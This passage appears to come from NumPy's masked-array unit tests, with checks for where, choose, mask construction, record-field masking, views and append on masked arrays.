assert_equal(zm, [1, 2, 3, 40, 50])
z = where(c, masked, 1)
assert_equal(z, [99, 99, 99, 1, 1])
z = where(c, 1, masked)
assert_equal(z, [99, 1, 1, 99, 99])
def test_where_type(self):
# Test the type conservation with where
x = np.arange(4, dtype=np.int32)
y = np.arange(4, dtype=np.float32) * 2.2
test = where(x > 1.5, y, x).dtype
control = np.find_common_type([np.int32, np.float32], [])
assert_equal(test, control)
def test_choose(self):
# Test choose
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
chosen = choose([2, 3, 1, 0], choices)
assert_equal(chosen, array([20, 31, 12, 3]))
chosen = choose([2, 4, 1, 0], choices, mode='clip')
assert_equal(chosen, array([20, 31, 12, 3]))
chosen = choose([2, 4, 1, 0], choices, mode='wrap')
assert_equal(chosen, array([20, 1, 12, 3]))
# Check with some masked indices
indices_ = array([2, 4, 1, 0], mask=[1, 0, 0, 1])
chosen = choose(indices_, choices, mode='wrap')
assert_equal(chosen, array([99, 1, 12, 99]))
assert_equal(chosen.mask, [1, 0, 0, 1])
# Check with some masked choices
choices = array(choices, mask=[[0, 0, 0, 1], [1, 1, 0, 1],
[1, 0, 0, 0], [0, 0, 0, 0]])
indices_ = [2, 3, 1, 0]
chosen = choose(indices_, choices, mode='wrap')
assert_equal(chosen, array([20, 31, 12, 3]))
assert_equal(chosen.mask, [1, 0, 0, 1])
def test_choose_with_out(self):
# Test choose with an explicit out keyword
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
store = empty(4, dtype=int)
chosen = choose([2, 3, 1, 0], choices, out=store)
assert_equal(store, array([20, 31, 12, 3]))
self.assertTrue(store is chosen)
# Check with some masked indices + out
store = empty(4, dtype=int)
indices_ = array([2, 3, 1, 0], mask=[1, 0, 0, 1])
chosen = choose(indices_, choices, mode='wrap', out=store)
assert_equal(store, array([99, 31, 12, 99]))
assert_equal(store.mask, [1, 0, 0, 1])
        # Check with some masked choices + out in a plain ndarray
choices = array(choices, mask=[[0, 0, 0, 1], [1, 1, 0, 1],
[1, 0, 0, 0], [0, 0, 0, 0]])
indices_ = [2, 3, 1, 0]
store = empty(4, dtype=int).view(ndarray)
chosen = choose(indices_, choices, mode='wrap', out=store)
assert_equal(store, array([999999, 31, 12, 999999]))
def test_reshape(self):
a = arange(10)
a[0] = masked
# Try the default
b = a.reshape((5, 2))
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['C'])
# Try w/ arguments as list instead of tuple
b = a.reshape(5, 2)
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['C'])
# Try w/ order
b = a.reshape((5, 2), order='F')
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['F'])
# Try w/ order
b = a.reshape(5, 2, order='F')
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['F'])
c = np.reshape(a, (2, 5))
self.assertTrue(isinstance(c, MaskedArray))
assert_equal(c.shape, (2, 5))
self.assertTrue(c[0, 0] is masked)
self.assertTrue(c.flags['C'])
def test_make_mask_descr(self):
# Test make_mask_descr
# Flexible
ntype = [('a', np.float), ('b', np.float)]
test = make_mask_descr(ntype)
assert_equal(test, [('a', np.bool), ('b', np.bool)])
# Standard w/ shape
ntype = (np.float, 2)
test = make_mask_descr(ntype)
assert_equal(test, (np.bool, 2))
# Standard standard
ntype = np.float
test = make_mask_descr(ntype)
assert_equal(test, np.dtype(np.bool))
# Nested
ntype = [('a', np.float), ('b', [('ba', np.float), ('bb', np.float)])]
test = make_mask_descr(ntype)
control = np.dtype([('a', 'b1'), ('b', [('ba', 'b1'), ('bb', 'b1')])])
assert_equal(test, control)
        # Named + shape
ntype = [('a', (np.float, 2))]
test = make_mask_descr(ntype)
assert_equal(test, np.dtype([('a', (np.bool, 2))]))
# 2 names
ntype = [(('A', 'a'), float)]
test = make_mask_descr(ntype)
assert_equal(test, np.dtype([(('A', 'a'), bool)]))
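    def test_make_mask_descr_idempotent_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): make_mask_descr maps every field to bool, so applying
        # it to its own output is a no-op.
        descr = make_mask_descr([('a', np.float), ('b', np.float)])
        assert_equal(make_mask_descr(descr), descr)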
def test_make_mask(self):
# Test make_mask
# w/ a list as an input
mask = [0, 1]
test = make_mask(mask)
assert_equal(test.dtype, MaskType)
assert_equal(test, [0, 1])
# w/ a ndarray as an input
mask = np.array([0, 1], dtype=np.bool)
test = make_mask(mask)
assert_equal(test.dtype, MaskType)
assert_equal(test, [0, 1])
# w/ a flexible-type ndarray as an input - use default
mdtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1)], dtype=mdtype)
test = make_mask(mask)
assert_equal(test.dtype, MaskType)
assert_equal(test, [1, 1])
# w/ a flexible-type ndarray as an input - use input dtype
mdtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1)], dtype=mdtype)
test = make_mask(mask, dtype=mask.dtype)
assert_equal(test.dtype, mdtype)
assert_equal(test, mask)
# w/ a flexible-type ndarray as an input - use input dtype
mdtype = [('a', np.float), ('b', np.float)]
bdtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1)], dtype=mdtype)
test = make_mask(mask, dtype=mask.dtype)
assert_equal(test.dtype, bdtype)
assert_equal(test, np.array([(0, 0), (0, 1)], dtype=bdtype))
def test_mask_or(self):
# Initialize
mtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1), (1, 0), (0, 0)], dtype=mtype)
# Test using nomask as input
test = mask_or(mask, nomask)
assert_equal(test, mask)
test = mask_or(nomask, mask)
assert_equal(test, mask)
# Using False as input
test = mask_or(mask, False)
assert_equal(test, mask)
# Using True as input. Won't work, but keep it for the kicks
# test = mask_or(mask, True)
# control = np.array([(1, 1), (1, 1), (1, 1), (1, 1)], dtype=mtype)
# assert_equal(test, control)
# Using another array w / the same dtype
other = np.array([(0, 1), (0, 1), (0, 1), (0, 1)], dtype=mtype)
test = mask_or(mask, other)
control = np.array([(0, 1), (0, 1), (1, 1), (0, 1)], dtype=mtype)
assert_equal(test, control)
# Using another array w / a different dtype
othertype = [('A', np.bool), ('B', np.bool)]
other = np.array([(0, 1), (0, 1), (0, 1), (0, 1)], dtype=othertype)
        try:
            test = mask_or(mask, other)
        except ValueError:
            pass
        else:
            raise AssertionError("Should have failed...")
# Using nested arrays
dtype = [('a', np.bool), ('b', [('ba', np.bool), ('bb', np.bool)])]
amask = np.array([(0, (1, 0)), (0, (1, 0))], dtype=dtype)
bmask = np.array([(1, (0, 1)), (0, (0, 0))], dtype=dtype)
cntrl = np.array([(1, (1, 1)), (0, (1, 0))], dtype=dtype)
assert_equal(mask_or(amask, bmask), cntrl)
def test_flatten_mask(self):
# Tests flatten mask
        # Standard dtype
mask = np.array([0, 0, 1], dtype=np.bool)
assert_equal(flatten_mask(mask), mask)
# Flexible dtype
mask = np.array([(0, 0), (0, 1)], dtype=[('a', bool), ('b', bool)])
test = flatten_mask(mask)
control = np.array([0, 0, 0, 1], dtype=bool)
assert_equal(test, control)
mdtype = [('a', bool), ('b', [('ba', bool), ('bb', bool)])]
data = [(0, (0, 0)), (0, (0, 1))]
mask = np.array(data, dtype=mdtype)
test = flatten_mask(mask)
control = np.array([0, 0, 0, 0, 0, 1], dtype=bool)
assert_equal(test, control)
def test_on_ndarray(self):
# Test functions on ndarrays
a = np.array([1, 2, 3, 4])
m = array(a, mask=False)
test = anom(a)
assert_equal(test, m.anom())
test = reshape(a, (2, 2))
assert_equal(test, m.reshape(2, 2))
def test_compress(self):
# Test compress function on ndarray and masked array
# Address Github #2495.
arr = np.arange(8)
arr.shape = 4, 2
cond = np.array([True, False, True, True])
control = arr[[0, 2, 3]]
test = np.ma.compress(cond, arr, axis=0)
assert_equal(test, control)
marr = np.ma.array(arr)
test = np.ma.compress(cond, marr, axis=0)
assert_equal(test, control)
def test_compressed(self):
# Test ma.compressed function.
# Address gh-4026
a = np.ma.array([1, 2])
test = np.ma.compressed(a)
assert_(type(test) is np.ndarray)
# Test case when input data is ndarray subclass
class A(np.ndarray):
pass
a = np.ma.array(A(shape=0))
test = np.ma.compressed(a)
assert_(type(test) is A)
# Test that compress flattens
test = np.ma.compressed([[1],[2]])
assert_equal(test.ndim, 1)
test = np.ma.compressed([[[[[1]]]]])
assert_equal(test.ndim, 1)
# Test case when input is MaskedArray subclass
class M(MaskedArray):
pass
test = np.ma.compressed(M(shape=(0,1,2)))
assert_equal(test.ndim, 1)
        # with .compressed() overridden
class M(MaskedArray):
def compressed(self):
return 42
test = np.ma.compressed(M(shape=(0,1,2)))
assert_equal(test, 42)
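    def test_compressed_values_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): compressed() keeps only the unmasked entries and
        # always returns a 1-d result, whatever the input shape.
        a = np.ma.array([[1, 2], [3, 4]], mask=[[0, 1], [1, 0]])
        test = a.compressed()
        assert_equal(test, [1, 4])
        assert_equal(test.ndim, 1)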
class TestMaskedFields(TestCase):
def setUp(self):
ilist = [1, 2, 3, 4, 5]
flist = [1.1, 2.2, 3.3, 4.4, 5.5]
slist = ['one', 'two', 'three', 'four', 'five']
ddtype = [('a', int), ('b', float), ('c', '|S8')]
mdtype = [('a', bool), ('b', bool), ('c', bool)]
mask = [0, 1, 0, 0, 1]
base = array(list(zip(ilist, flist, slist)), mask=mask, dtype=ddtype)
self.data = dict(base=base, mask=mask, ddtype=ddtype, mdtype=mdtype)
def test_set_records_masks(self):
base = self.data['base']
mdtype = self.data['mdtype']
# Set w/ nomask or masked
base.mask = nomask
assert_equal_records(base._mask, np.zeros(base.shape, dtype=mdtype))
base.mask = masked
assert_equal_records(base._mask, np.ones(base.shape, dtype=mdtype))
# Set w/ simple boolean
base.mask = False
assert_equal_records(base._mask, np.zeros(base.shape, dtype=mdtype))
base.mask = True
assert_equal_records(base._mask, np.ones(base.shape, dtype=mdtype))
# Set w/ list
base.mask = [0, 0, 0, 1, 1]
assert_equal_records(base._mask,
np.array([(x, x, x) for x in [0, 0, 0, 1, 1]],
dtype=mdtype))
def test_set_record_element(self):
        # Check setting an element of a record
base = self.data['base']
(base_a, base_b, base_c) = (base['a'], base['b'], base['c'])
base[0] = (pi, pi, 'pi')
assert_equal(base_a.dtype, int)
assert_equal(base_a._data, [3, 2, 3, 4, 5])
assert_equal(base_b.dtype, float)
assert_equal(base_b._data, [pi, 2.2, 3.3, 4.4, 5.5])
assert_equal(base_c.dtype, '|S8')
assert_equal(base_c._data,
asbytes_nested(['pi', 'two', 'three', 'four', 'five']))
def test_set_record_slice(self):
base = self.data['base']
(base_a, base_b, base_c) = (base['a'], base['b'], base['c'])
base[:3] = (pi, pi, 'pi')
assert_equal(base_a.dtype, int)
assert_equal(base_a._data, [3, 3, 3, 4, 5])
assert_equal(base_b.dtype, float)
assert_equal(base_b._data, [pi, pi, pi, 4.4, 5.5])
assert_equal(base_c.dtype, '|S8')
assert_equal(base_c._data,
asbytes_nested(['pi', 'pi', 'pi', 'four', 'five']))
def test_mask_element(self):
"Check record access"
base = self.data['base']
base[0] = masked
for n in ('a', 'b', 'c'):
assert_equal(base[n].mask, [1, 1, 0, 0, 1])
assert_equal(base[n]._data, base._data[n])
def test_getmaskarray(self):
# Test getmaskarray on flexible dtype
ndtype = [('a', int), ('b', float)]
test = empty(3, dtype=ndtype)
assert_equal(getmaskarray(test),
np.array([(0, 0), (0, 0), (0, 0)],
dtype=[('a', '|b1'), ('b', '|b1')]))
test[:] = masked
assert_equal(getmaskarray(test),
np.array([(1, 1), (1, 1), (1, 1)],
dtype=[('a', '|b1'), ('b', '|b1')]))
def test_view(self):
# Test view w/ flexible dtype
iterator = list(zip(np.arange(10), np.random.rand(10)))
data = np.array(iterator)
a = array(iterator, dtype=[('a', float), ('b', float)])
a.mask[0] = (1, 0)
controlmask = np.array([1] + 19 * [0], dtype=bool)
# Transform globally to simple dtype
test = a.view(float)
assert_equal(test, data.ravel())
assert_equal(test.mask, controlmask)
        # Transform globally to a compound dtype
test = a.view((float, 2))
assert_equal(test, data)
assert_equal(test.mask, controlmask.reshape(-1, 2))
test = a.view((float, 2), np.matrix)
assert_equal(test, data)
self.assertTrue(isinstance(test, np.matrix))
def test_getitem(self):
ndtype = [('a', float), ('b', float)]
a = array(list(zip(np.random.rand(10), np.arange(10))), dtype=ndtype)
a.mask = np.array(list(zip([0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 1, 0])),
dtype=[('a', bool), ('b', bool)])
# No mask
self.assertTrue(isinstance(a[1], MaskedArray))
# One element masked
self.assertTrue(isinstance(a[0], MaskedArray))
assert_equal_records(a[0]._data, a._data[0])
assert_equal_records(a[0]._mask, a._mask[0])
# All element masked
self.assertTrue(isinstance(a[-2], MaskedArray))
assert_equal_records(a[-2]._data, a._data[-2])
assert_equal_records(a[-2]._mask, a._mask[-2])
def test_setitem(self):
# Issue 4866: check that one can set individual items in [record][col]
# and [col][record] order
ndtype = np.dtype([('a', float), ('b', int)])
ma = np.ma.MaskedArray([(1.0, 1), (2.0, 2)], dtype=ndtype)
ma['a'][1] = 3.0
assert_equal(ma['a'], np.array([1.0, 3.0]))
ma[1]['a'] = 4.0
assert_equal(ma['a'], np.array([1.0, 4.0]))
# Issue 2403
mdtype = np.dtype([('a', bool), ('b', bool)])
# soft mask
control = np.array([(False, True), (True, True)], dtype=mdtype)
a = np.ma.masked_all((2,), dtype=ndtype)
a['a'][0] = 2
assert_equal(a.mask, control)
a = np.ma.masked_all((2,), dtype=ndtype)
a[0]['a'] = 2
assert_equal(a.mask, control)
# hard mask
control = np.array([(True, True), (True, True)], dtype=mdtype)
a = np.ma.masked_all((2,), dtype=ndtype)
a.harden_mask()
a['a'][0] = 2
assert_equal(a.mask, control)
a = np.ma.masked_all((2,), dtype=ndtype)
a.harden_mask()
a[0]['a'] = 2
assert_equal(a.mask, control)
def test_element_len(self):
# check that len() works for mvoid (Github issue #576)
for rec in self.data['base']:
assert_equal(len(rec), len(self.data['ddtype']))
class TestMaskedView(TestCase):
def setUp(self):
iterator = list(zip(np.arange(10), np.random.rand(10)))
data = np.array(iterator)
a = array(iterator, dtype=[('a', float), ('b', float)])
a.mask[0] = (1, 0)
controlmask = np.array([1] + 19 * [0], dtype=bool)
self.data = (data, a, controlmask)
def test_view_to_nothing(self):
(data, a, controlmask) = self.data
test = a.view()
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test._data, a._data)
assert_equal(test._mask, a._mask)
def test_view_to_type(self):
(data, a, controlmask) = self.data
test = a.view(np.ndarray)
self.assertTrue(not isinstance(test, MaskedArray))
assert_equal(test, a._data)
assert_equal_records(test, data.view(a.dtype).squeeze())
def test_view_to_simple_dtype(self):
(data, a, controlmask) = self.data
# View globally
test = a.view(float)
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data.ravel())
assert_equal(test.mask, controlmask)
def test_view_to_flexible_dtype(self):
(data, a, controlmask) = self.data
test = a.view([('A', float), ('B', float)])
assert_equal(test.mask.dtype.names, ('A', 'B'))
assert_equal(test['A'], a['a'])
assert_equal(test['B'], a['b'])
test = a[0].view([('A', float), ('B', float)])
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test.mask.dtype.names, ('A', 'B'))
assert_equal(test['A'], a['a'][0])
assert_equal(test['B'], a['b'][0])
test = a[-1].view([('A', float), ('B', float)])
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test.dtype.names, ('A', 'B'))
assert_equal(test['A'], a['a'][-1])
assert_equal(test['B'], a['b'][-1])
def test_view_to_subdtype(self):
(data, a, controlmask) = self.data
# View globally
test = a.view((float, 2))
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data)
assert_equal(test.mask, controlmask.reshape(-1, 2))
# View on 1 masked element
test = a[0].view((float, 2))
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data[0])
assert_equal(test.mask, (1, 0))
# View on 1 unmasked element
test = a[-1].view((float, 2))
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data[-1])
def test_view_to_dtype_and_type(self):
(data, a, controlmask) = self.data
test = a.view((float, 2), np.matrix)
assert_equal(test, data)
self.assertTrue(isinstance(test, np.matrix))
self.assertTrue(not isinstance(test, MaskedArray))
def test_masked_array():
a = np.ma.array([0, 1, 2, 3], mask=[0, 0, 1, 0])
assert_equal(np.argwhere(a), [[1], [3]])
def test_append_masked_array():
a = np.ma.masked_equal([1,2,3], value=2)
b = np.ma.masked_equal([4,3,2], value=2)
result = np.ma.append(a, b)
expected_data = [1, 2, 3, 4, 3, 2]
expected_mask = [False, True, False, False, False, True]
assert_array_equal(result.data, expected_data)
assert_array_equal(result.mask, expected_mask)
a = np.ma.masked_all((2,2))
b = np.ma.ones((3,1))
result = np.ma.append(a, b)
expected_data = [1] * 3
expected_mask = [True] * 4 + [False] * 3
    assert_array_equal(result.data[-3:], expected_data)
assert_array_equal(result.mask, expected_mask)
result = np.ma.append(a, b, axis=None)
    assert_array_equal(result.data[-3:], expected_data)
assert_array_equal(result.mask, expected_mask)
def test_append_masked_array_along_axis():
a = np.ma.masked_equal([1,2,3], value=2)
b = np.ma.masked_values([[4, 5, 6], [7, 8, 9]], 7)
# When `axis` is specified, `values` must have the correct shape.
assert_raises(ValueError, np.ma.append, a, b, axis=0)
result = np.ma.append(a[np.newaxis,:], b, axis=0)
expected = np.ma.arange(1, 10)
expected[[1, 6]] = np.ma.masked
expected = expected.reshape((3,3))
assert_array_equal(result.data, expected.data)
assert_array_equal(result.mask, expected.mask)
def test_default_fill_value_complex():
# regression test for Python 3, where 'unicode' was not defined
assert default_fill_value(1 + 1j) == 1.e20 + 0.0j
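def test_default_fill_value_float():
    # Editor's sketch (hypothetical test, not part of the original
    # suite): the plain-float default mirrors the complex case checked
    # above, without the imaginary part.
    assert default_fill_value(1.) == 1.e20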
###############################################################################
if __name__ == "__main__":
run_module_suite()<|fim▁end|>